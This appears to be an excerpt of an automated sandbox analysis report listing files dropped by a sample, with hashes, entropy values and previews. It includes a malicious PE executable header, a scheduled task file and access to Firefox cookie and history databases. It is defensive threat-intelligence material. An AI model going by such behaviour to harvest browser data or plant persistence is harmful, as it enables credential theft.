MXlqbUlyRDZ2dzlsa1VxdzZTdjAyUk1oVkEifSx7InBhdGgiOiJfbG9jYWxlcy9iZy9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiSXJ3M3RIem9xREx6bHdGa0hjTllOWFoyNmI0WWVwT2t4ZFN

C:\Users\user\AppData\Local\Temp\scoped_dir7896_540653892\CRX_INSTALL\dasherSettingSchema.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	854
Entropy (8bit):	4.284628987131403
Encrypted:	false
SSDEEP:	12:ont+QByTwnnGNcMbyWM+Q9TZldnnnGGxlF/S0WOtUL0M0r:vOrGe4dDCVGOjWJ0nr
MD5:	4EC1DF2DA46182103D2FFC3B92D20CA5
SHA1:	FB9D1BA3710CF31A87165317C6EDC110E98994CE
SHA-256:	6C69CE0FE6FAB14F1990A320D704FEE362C175C00EB6C9224AA6F41108918CA6
SHA-512:	939D81E6A82B10FF73A35C931052D8D53D42D915E526665079EEB4820DF4D70F1C6AEBAB70B59519A0014A48514833FEFD687D5A3ED1B06482223A168292105D
Malicious:	false
Preview:	{. "type": "object",. "properties": {. "allowedDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Allow users to enable Docs offline for the specified managed domains.",. "description": "Users on managed devices will be able to enable docs offline if they are part of the specified managed domains.". },. "autoEnabledDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Auto enable Docs offline for the specified managed domains in certain eligible situations.",. "description": "Users on managed devices, in certain eligible situations, will be able to automatically access and edit recent files offline for the managed domains set in this property. They can still disable it from Drive settings.". }. }.}.

C:\Users\user\AppData\Local\Temp\scoped_dir7896_540653892\CRX_INSTALL\manifest.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2525
Entropy (8bit):	5.417781191647272
Encrypted:	false
SSDEEP:	24:1HEZ4WPoolELb/KxktGw3VwELb/4iL2QDkUpvdz1xxy/Atj1H9yiVvQe:WdP5aLTKQGwlTLT4oRvvxs/APHgiVb
MD5:	35068E2550395A8A3E74558F2F4658DA
SHA1:	BD6620054059BFB7A27A4FFF86B9966727F2C2B9
SHA-256:	E2F418C816895E830541F48C0406B9398805E88B61A4EC816244154CD793743C
SHA-512:	4BCB971D7353648ABF25ACA7A4A4771F62BBB76F8FC13BDE886F29826D9314F5101942492004FC719493604D317958B63A95CF5173F8180214F27D6BEA303F97
Malicious:	false
Preview:	{.. "author": {.. "email": "docs-hosted-app-own@google.com".. },.. "background": {.. "service_worker": "service_worker_bin_prod.js".. },.. "content_capabilities": {.. "matches": [ "https://docs.google.com/", "https://drive.google.com/", "https://drive-autopush.corp.google.com/", "https://drive-daily-0.corp.google.com/", "https://drive-daily-1.corp.google.com/", "https://drive-daily-2.corp.google.com/", "https://drive-daily-3.corp.google.com/", "https://drive-daily-4.corp.google.com/", "https://drive-daily-5.corp.google.com/", "https://drive-daily-6.corp.google.com/", "https://drive-preprod.corp.google.com/", "https://drive-staging.corp.google.com/" ],.. "permissions": [ "clipboardRead", "clipboardWrite", "unlimitedStorage" ].. },.. "content_security_policy": {.. "extension_pages": "script-src 'self'; object-src 'self'".. },.. "default_locale": "en_US",.. "description": "__MSG_extDesc__",.. "externally_connectable": {.. "ma

C:\Users\user\AppData\Local\Temp\scoped_dir7896_540653892\CRX_INSTALL\offscreendocument.html

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	HTML document, ASCII text
Category:	dropped
Size (bytes):	97
Entropy (8bit):	4.862433271815736
Encrypted:	false
SSDEEP:	3:PouV7uJL5XL/oGLvLAAJR90bZNGXIL0Hac4NGb:hxuJL5XsOv0EmNV4HX4Qb
MD5:	B747B5922A0BC74BBF0A9BC59DF7685F
SHA1:	7BF124B0BE8EE2CFCD2506C1C6FFC74D1650108C
SHA-256:	B9FA2D52A4FFABB438B56184131B893B04655B01F336066415D4FE839EFE64E7
SHA-512:	7567761BE4054FCB31885E16D119CD4E419A423FFB83C3B3ED80BFBF64E78A73C2E97AAE4E24AB25486CD1E43877842DB0836DB58FBFBCEF495BC53F9B2A20EC
Malicious:	false
Preview:	<!DOCTYPE html>.<html>.<body>. <script src="offscreendocument_main.js"></script>.</body>.</html>

C:\Users\user\AppData\Local\Temp\scoped_dir7896_540653892\CRX_INSTALL\offscreendocument_main.js

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with very long lines (3700)
Category:	dropped
Size (bytes):	95606
Entropy (8bit):	5.405749379350638
Encrypted:	false
SSDEEP:	1536:rFTnpa+88KmEfryTdXPVy0d8RZZ0Qk4CWbsnf29Gmyj9tIRRduRnCrl:almPXPVCFCWbsnDVQRwF0l
MD5:	9D0EF4F7CB0306DCB7A7CDCD6DC2CCC7
SHA1:	88D7F0A88C5807BFE00F13B612CC0522EEBE514A
SHA-256:	E5E4392B21A21ECAFD27707BF70F95961B2656735A20B40BA54479D40EAB063C
SHA-512:	34CD9AF9199DE606A531E98DB82BEAA5552E59BCCB2AB2BF49F82D6FA05425EB6936BC5F03BFC421AB6980B91395D9FDC5F0776882E1D49B3217CD35641FF906
Malicious:	false
Preview:	'use strict';function aa(){return function(a){return a}}function ba(){return function(){}}function l(a){return function(){return this[a]}}function ca(a){return function(){return a}}var n;function da(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var ea=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype\|\|a==Object.prototype)return a;a[b]=c.value;return a};.function fa(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var q=fa(this);function r(a,b){if(b)a:{var c=q;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&ea(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new Ty

C:\Users\user\AppData\Local\Temp\scoped_dir7896_540653892\CRX_INSTALL\page_embed_script.js

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	291
Entropy (8bit):	4.65176400421739
Encrypted:	false
SSDEEP:	6:2LGX86tj66rU8j6D3bWq2un/XBtzHrH9Mnj63LK603:2Q8KVqb2u/Rt3Onj1
MD5:	3AB0CD0F493B1B185B42AD38AE2DD572
SHA1:	079B79C2ED6F67B5A5BD9BC8C85801F96B1B0F4B
SHA-256:	73E3888CCBC8E0425C3D2F8D1E6A7211F7910800EEDE7B1E23AD43D3B21173F7
SHA-512:	32F9DB54654F29F39D49F7A24A1FC800DBC0D4A8A1BAB2369C6F9799BC6ADE54962EFF6010EF6D6419AE51D5B53EC4B26B6E2CDD98DEF7CC0D2ADC3A865F37D3
Malicious:	false
Preview:	(function(){window._docs_chrome_extension_exists=!0;window._docs_chrome_extension_features_version=2;window._docs_chrome_extension_permissions="alarms clipboardRead clipboardWrite storage unlimitedStorage offscreen".split(" ");window._docs_chrome_extension_manifest_version=3;}).call(this);.

C:\Users\user\AppData\Local\Temp\scoped_dir7896_540653892\CRX_INSTALL\service_worker_bin_prod.js

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with very long lines (3705)
Category:	dropped
Size (bytes):	104595
Entropy (8bit):	5.385879258644142
Encrypted:	false
SSDEEP:	1536:CvBfoqPByzpq7Wj3X5GtH2n4JvHDxwKMpFs0vuFfkR/2oTnHu96Iny0Kj2ThzfS:BlXQtoZrs0vskDTHu9rhTS
MD5:	4E0C47897BF98DEAC56F800942E150C4
SHA1:	7903D30E0ACEE273724BDAA67446D9FD4E8460A5
SHA-256:	FE76EA0C2F81E6140F38F4143B40BE85014B93FF80737600CFB39AEB5C8C6537
SHA-512:	8B31463FC683439BAB5D4AEFE2BE0F6A9F5B695C2D95AFF3F842BFC74B10AE3D386D288121161506F74A08FB86D25C1096DA4177B768254BF84E83983982640F
Malicious:	false
Preview:	'use strict';function aa(){return function(){}}function k(a){return function(){return this[a]}}function ba(a){return function(){return a}}var n;function ca(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var da=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype\|\|a==Object.prototype)return a;a[b]=c.value;return a};.function ea(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var q=ea(this);function r(a,b){if(b)a:{var c=q;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&da(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new TypeError("Symbol is not a constructor");retu

C:\Users\user\AppData\Local\Temp\scoped_dir7896_540653892\af5074c4-d1a3-4144-9bbc-d68db7a83d7f.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Google Chrome extension, version 3
Category:	dropped
Size (bytes):	135771
Entropy (8bit):	7.802585890890899
Encrypted:	false
SSDEEP:	3072:LtlntxI0jRnnf4pTz8IayMaCRABlauflM+u0F/oWRW:pl4+hf4pTky1EABYufNFS4W
MD5:	DA75BB05D10ACC967EECAAC040D3D733
SHA1:	95C08E067DF713AF8992DB113F7E9AEC84F17181
SHA-256:	33AE9B8F06DC777BB1A65A6BA6C3F2A01B25CD1AFC291426B46D1DF27EA6E7E2
SHA-512:	56533DE53872F023809A20D1EA8532CDC2260D40B05C5A7012C8E61576FF092F006A197F759C92C6B8C429EEEC4BB542073B491DDCFD5B22CD4ECBE1A8A7C6EF
Malicious:	false
Preview:	Cr24..............0.."0....H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.qBa/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.\|.X.M..u..s[...?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[...........=.B.../EYp....i:........ua....w...\H.j....b....4...l.b.:u.%1z....}L.A.F.IZ.2^.j...!F.&@;L..z...02..`:J_@....m....qcQ.\|sD.r`vC.#.8lm...R.8.~A...."~)".[.M...o.a.H.$..(.d/.K.6......c........#.$..>.#..3..-...n4J.$-....N...s.G...3..q.e..(.B?."...9M......[0Y0....H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...H0F.!..w./B..$<......r-.'..xp.H..Q...8.!..R^...%..W0....q....g.D..~.".%............mo.:......<#a..e...Chp...x4z....!.!.a...qgo....p8.T.6...Z....?..CV...<..K...?....k..........q=....Y^........!..K...G...m.n..Y.Y.......u.Wf...TO".?.......U/Rd..Y....j....H..Q...{.....x.OQ.~+}...L.9_.:.,E.....q.0&...I;b..H...>...9.}.B

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Nov 11 08:33:08 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2677
Entropy (8bit):	3.977449031256953
Encrypted:	false
SSDEEP:	48:8rdaTmutHHidAKZdA19ehwiZUklqehry+3:8wvHky
MD5:	7FF6760CF1B81C30C3AF78E4CE5D56F0
SHA1:	B372FB805040000D031D451F4F49F4C803D5D295
SHA-256:	822B936E80669A614E008E396187B4BE05EDEAB4990D4D0AD23735179F40F25E
SHA-512:	F50EF1F87994C99620428E6D102B838F8A6EFC38E12691F3A50028C65F47FC9817EB0B56E75D9594F1EB197AC3B9D171D7B6953D503345AA44085ECEE77B4F16
Malicious:	false
Preview:	L..................F.@.. ...$+.,.....W...4..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.IkY#L....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VkY#L....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VkY#L....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VkY#L..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VkY$L...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........].%[.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Nov 11 08:33:08 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2679
Entropy (8bit):	3.9920179594317777
Encrypted:	false
SSDEEP:	48:83daTmutHHidAKZdA1weh/iZUkAQkqehUy+2:8kvt9Qpy
MD5:	6CD78B2CD6B39E80454A1C3854191EDE
SHA1:	74A9C658A7ED6FB5C2A1C355143C4AE5357615D2
SHA-256:	2DA06046CFF72CA50C09AE8CB73361E66D7DDE63F91F2AF1FAE2D3E642A5C4B2
SHA-512:	5A15CD9CB6629A00322905A2CD5D3E169D6A96375623A70017F9F7785C4711D0FA1BAC68BD5E1670B29EEB310CE01E9FA32595B3D6FBB5B3746414ED7159AA05
Malicious:	false
Preview:	L..................F.@.. ...$+.,.........4..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.IkY#L....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VkY#L....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VkY#L....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VkY#L..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VkY$L...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........].%[.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2693
Entropy (8bit):	4.0053894601122595
Encrypted:	false
SSDEEP:	48:8xvdaTmusHHidAKZdA14tseh7sFiZUkmgqeh7siy+BX:8xcvynoy
MD5:	B1FA82E57152161D00C33660126783DC
SHA1:	D8BC5E270D09A64831E2B2DD39B10C4274FBF3E0
SHA-256:	6E9CD42D513AB30284C2D234ED0BACB7BDE4B4EB8585A03DA180DF33F98195DB
SHA-512:	339B9EEDE246BBFF100ADBC96FFEAF2E547817AD7D802E92B09EAA70571A0978B6E5E14F202184063A1E91C917E5429CDC52DB860E443E5BF3173230C3C9F69A
Malicious:	false
Preview:	L..................F.@.. ...$+.,......e>....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.IkY#L....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VkY#L....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VkY#L....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VkY#L..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VDW.n...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........].%[.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Nov 11 08:33:08 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2681
Entropy (8bit):	3.990908964562659
Encrypted:	false
SSDEEP:	48:8sdaTmutHHidAKZdA1vehDiZUkwqehgy+R:8VvOay
MD5:	9D96548AFD00DC4DC7E4079EA58DA2B3
SHA1:	AFC5436428A0D5FACA0294DA55DA0E893565CC0D
SHA-256:	C197BC9834B616589C73D9C80000EB183AED0749DCF2A86716545E6185FFEA8E
SHA-512:	5254FE51859E80C5FD972B73B5698540485D11BF6B17860B7B689481288994B06C0F52916925C26141D17EBF0A708AEBFF62CC0150BF0AFE516E4EB1BA710570
Malicious:	false
Preview:	L..................F.@.. ...$+.,.........4..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.IkY#L....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VkY#L....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VkY#L....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VkY#L..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VkY$L...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........].%[.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Nov 11 08:33:08 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2681
Entropy (8bit):	3.9785964607668265
Encrypted:	false
SSDEEP:	48:8sdaTmutHHidAKZdA1hehBiZUk1W1qehmy+C:8Vv+9Gy
MD5:	D5009A4B4C0CB54D9B3E2DBCB1F75F04
SHA1:	27B7061903224BE56FA645170D4D8578716B0C83
SHA-256:	FEA2E6EB638A303EF5D8AA40C12B6CFEE6FA77E96D7DBFE974684F711162F464
SHA-512:	B8524B283BD9CE62E566AE1FA5253661667EC8E7001FFF2A4D2A0EC6B0F9DAC23A49BCE4DAA02D4E6E5C8F774C2EF42D7AB28555BDEC4B1D11536C5E858D9FBE
Malicious:	false
Preview:	L..................F.@.. ...$+.,....s....4..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.IkY#L....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VkY#L....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VkY#L....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VkY#L..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VkY$L...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........].%[.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Nov 11 08:33:07 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2683
Entropy (8bit):	3.9887657644586776
Encrypted:	false
SSDEEP:	48:85daTmutHHidAKZdA1duT+ehOuTbbiZUk5OjqehOuTboy+yT+:8uvgT/TbxWOvTboy7T
MD5:	A2164BA017134E12867C60290EA411A4
SHA1:	2FBCC92A4ABB59ADCECB2FBB2C63AC252690E217
SHA-256:	88ACC9AD1FC544D7F124EA75D2D5851F248B07C457E8B0D2DF47E67574E30D05
SHA-512:	3C664A76915093972025A5F862D85372554660E716381D917C57A016B065E435D77D9322D3A9C983A53515253B557F55F3F117C0367C4477A3B90D640620B856
Malicious:	false
Preview:	L..................F.@.. ...$+.,......o..4..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.IkY#L....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VkY#L....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VkY#L....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VkY#L..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VkY$L...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........].%[.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-shm

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\DocumentsJDAKJDAAFB.exe

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3330048
Entropy (8bit):	6.667746320253858
Encrypted:	false
SSDEEP:	49152:ZXyYwvHtEqXS69Jpev1g+fKxswyhWUwpGSbsNSUXKOp1n1I93au2:ZGvdS69JpE1/fKxVyhWzpGSmKK1nkaH
MD5:	54DBEA291C01A2BDFB4E2D6AE249EDE3
SHA1:	8A15E8A821C21393858C379A83FC4E10ACBD07A8
SHA-256:	05536FBD44E541D4305EC57E94DFE5AFD556DC09FED50A7BBBCEB02B7AF42883
SHA-512:	58987D0741F73B51EECBD9F5036BCCA644C16F4D71EBB5B1368D5B3E7B43A831D587BA9ED23A9BE7109A7CC0662E232B5D061DB5B288296B4140EE50C7B880AD
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f..............................2...........@...........................3.....(.3...@.................................W...k.............................2...............................2..................................................... . ............................@....rsrc...............................@....idata ............................@...fcsiqomq. ,.......,.................@...cxhhchgb......2.......2.............@....taggant.0....2.."....2.............@...........................................................................................................................................................................................................................................................

C:\Windows\Tasks\skotes.job

Download File

Process:	C:\Users\user\DocumentsJDAKJDAAFB.exe
File Type:	data
Category:	dropped
Size (bytes):	290
Entropy (8bit):	3.364692467632695
Encrypted:	false
SSDEEP:	6:HdTX55ZsUEZ+lX1CGdKUe6tFXqYEp5t/uy0lBYt0:HdTuQ1CGAFifXVBYt0
MD5:	A7766E29AADF6341937A8AF107DDA541
SHA1:	9C3194A9654EE4B6C3FDD77E658DFAF3EB8B24BD
SHA-256:	6F913A38814883BF1216245526ED18044EA7EE5A3E935334E578BF0B55A308B4
SHA-512:	00B71019ADB8BFFDB51D3B7D74353E8920633986C4BCAC94D18039D2EA9EF7988F5A17D05A691CF2334C74BB6DD3CE936C3DA8E3EE0F6AD1196EED78CBE24BB8
Malicious:	false
